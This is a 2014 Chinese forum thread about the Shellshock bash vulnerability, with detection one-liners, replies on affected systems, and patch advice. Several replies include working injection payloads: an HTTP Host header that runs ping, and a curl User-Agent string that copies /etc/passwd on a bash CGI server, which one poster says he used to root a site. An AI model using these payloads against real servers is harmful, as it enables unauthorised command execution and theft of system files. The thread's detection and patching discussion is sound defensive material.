Home Sign Up Sign In
windyboy

bash 的漏洞,你们中招了吗?

  •  1      
  •   windyboy · Sep 25, 2014 · 9947 views
    This topic created in 4274 days ago, the information mentioned may be changed or developed.
    http://threatpost.com/major-bash-vulnerability-affects-linux-unix-mac-os-x

    检测:

    $ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
    中招的显示:

    vulnerable
    this is a test

    如果是没有问题,则是下面
    $ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
    bash: warning: x: ignoring function definition attempt
    bash: error importing function definition for `x'
    this is a test
    Supplement 1  ·  Sep 26, 2014
    补充一下这个问题的危害:
    GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution.

    简单的http攻击的例子(ddos?)
    Http头里如果这样写:
    http-header = Host:() { :; }; ping -c 3 8.8.8.8
    貌似在服务器上就执行了ping
  • bash
  • vulnerable
  • env
    44 replies    2014-09-26 15:31:02 +08:00
    Earthman
        1
    Earthman  
       Sep 25, 2014
    debian sid中招
    Bakemono
        2
    Bakemono  
       Sep 25, 2014
    影响范围很大的。
    我已经成功复现本地搭建的 cgi-bin 的网站,执行命令并且回显,目测很多都会沦陷掉..
    lu18887
        3
    lu18887  
       Sep 25, 2014
    @Bakemono 有这么严重?只有自己用的服务器都不行?
    jimmy2010
        4
    jimmy2010  
       Sep 25, 2014
    @Bakemono 有具体执行的细节么,我也想测试一下我的网站。debian nginx php fast-cgi
    ccbikai
        5
    ccbikai  
    PRO
       Sep 25, 2014
    手里的五台都中………………
    ryon
        6
    ryon  
       Sep 25, 2014
    有修复方案了么
    icevil
        7
    icevil  
       Sep 25, 2014   ❤️ 1
    @jimmy2010

    http://zone.wooyun.org/content/15392
    chenshaoju
        8
    chenshaoju  
       Sep 25, 2014
    http://twitter.com/chenshaoju/status/514989026042855424


    两台全中,Debian 7.6
    14
        9
    14  
       Sep 25, 2014
    sudo apt-get update && sudo apt-get updrade 检测到bash更新,更新之后就好了~
    mml
        10
    mml  
       Sep 25, 2014
    这个补丁还是有问题,继续关注等更新吧。
    moname
        11
    moname  
       Sep 25, 2014
    一早起来就update了
    cielpy
        12
    cielpy  
       Sep 25, 2014
    中招了。。
    orzfly
        13
    orzfly  
       Sep 25, 2014   ❤️ 1
    @14 其实可以省略 -get
    apt update && apt upgrade
    14
        14
    14  
       Sep 25, 2014
    @orzfly 赞!现在才知道
    Bakemono
        15
    Bakemono  
       Sep 25, 2014   ❤️ 1
    @jimmy2010 php不必担心的样子
    @lu18887 挺严重的,我已经测试某网站并且root掉了..

    具体细节..>_>
    curl -A'() { :; }; /bin/cat /etc/passwd > /tmp/test' http://192.168.0.1/poc.cgi
    loveminds
        16
    loveminds  
       Sep 25, 2014
    没记错的话bash应该不是setuid的程序吧
    lightforce
        17
    lightforce  
       Sep 25, 2014
    env X='() { (a)=>\' bash -c "echo echo vuln"; [[ "$(cat echo)" == "vuln" ]] && echo "still vulnerable :("
    yemoluo
        18
    yemoluo  
       Sep 25, 2014
    我的macbook 肿么办
    q397064399
        19
    q397064399  
       Sep 25, 2014
    @GTim 这个貌似也得先取得user权限吧
    q397064399
        20
    q397064399  
       Sep 25, 2014
    @Bakemono 如何利用? 用php先取得用户权限 执行shell 然后用这个漏洞提升到root?
    Bakemono
        21
    Bakemono  
       Sep 25, 2014
    @q397064399 利用方法我已经写了,不需要任何权限,只要是 *纯bash* 的 cgi 就可以,当然我只测试了 apache 的
    duzhe0
        22
    duzhe0  
       Sep 25, 2014
    debian的默认shell是dash, 所以debian的服务器受影响应该比较小。
    duzhe0
        23
    duzhe0  
       Sep 25, 2014
    @Bakemono 我看curl的-A选项是指定User-Agent, 为什么这个会作为env传给cgi呢?
    Bakemono
        24
    Bakemono  
       Sep 25, 2014   ❤️ 1
    @duzhe0 Apache 会把 User-Agent 当作环境变量去声明,所以会导致漏洞发生。
    duzhe0
        25
    duzhe0  
       Sep 25, 2014
    @Bakemono 哦,想起来了
    lu18887
        26
    lu18887  
       Sep 25, 2014
    @Bakemono apache + mod_wsgi+django有问题?
    jiang42
        27
    jiang42  
       Sep 25, 2014
    freeBSD 10.0中招
    iac
        29
    iac  
       Sep 25, 2014
    有没有比较快速的漏洞披露平台求推荐
    Bakemono
        30
    Bakemono  
       Sep 25, 2014
    @pimin 其实我自己写了个..
    @lu18887 没有
    paloalto
        31
    paloalto  
       Sep 25, 2014
    [root@li566-238 ~]# $ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
    -bash: $: command not found

    哈哈哈哈哈哈
    zhoulujue
        32
    zhoulujue  
       Sep 25, 2014
    bash: 警告: x: ignoring function definition attempt
    bash: `x' 函数定义导入错误
    this is a test
    cj1324
        33
    cj1324  
       Sep 25, 2014
    @14 未必 嘿嘿。 继续等升级包。
    Automan
        34
    Automan  
       Sep 25, 2014
    @paloalto 把$符号去掉
    miyuki
        35
    miyuki  
       Sep 25, 2014 via Android
    阿里云bash貌似也是 刚才接到了了紧急通知
    GPU
        36
    GPU  
       Sep 25, 2014
    有一台中招了。
    Tz101
        37
    Tz101  
       Sep 25, 2014 via Android
    手头的Android也中招了
    lwbjing
        38
    lwbjing  
       Sep 25, 2014
    centos 6.5中招,已修复。
    P9
        39
    P9  
       Sep 25, 2014
    这个原理是????
    tideline
        40
    tideline  
       Sep 25, 2014
    Macbook 中招😭
    Earthman
        41
    Earthman  
       Sep 25, 2014
    今晚更新后没问题了
    noikiy
        42
    noikiy  
       Sep 25, 2014
    @Bakemono 反弹之后也是要有可用的exp才可以提权到root吧
    windyboy
        43
    windyboy  
    OP
       Sep 26, 2014 via Android
    @iac threatpost.com
    fork3rt
        44
    fork3rt  
       Sep 26, 2014
    用zsh的飘过
    About   ·   Help   ·   Advertise   ·   Blog   ·   API   ·   FAQ   ·   Solana   ·   1454 Online   Highest 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 120ms · UTC 16:53 · PVG 00:53 · LAX 09:53 · JFK 12:53
    ♥ Do have faith in what you're doing.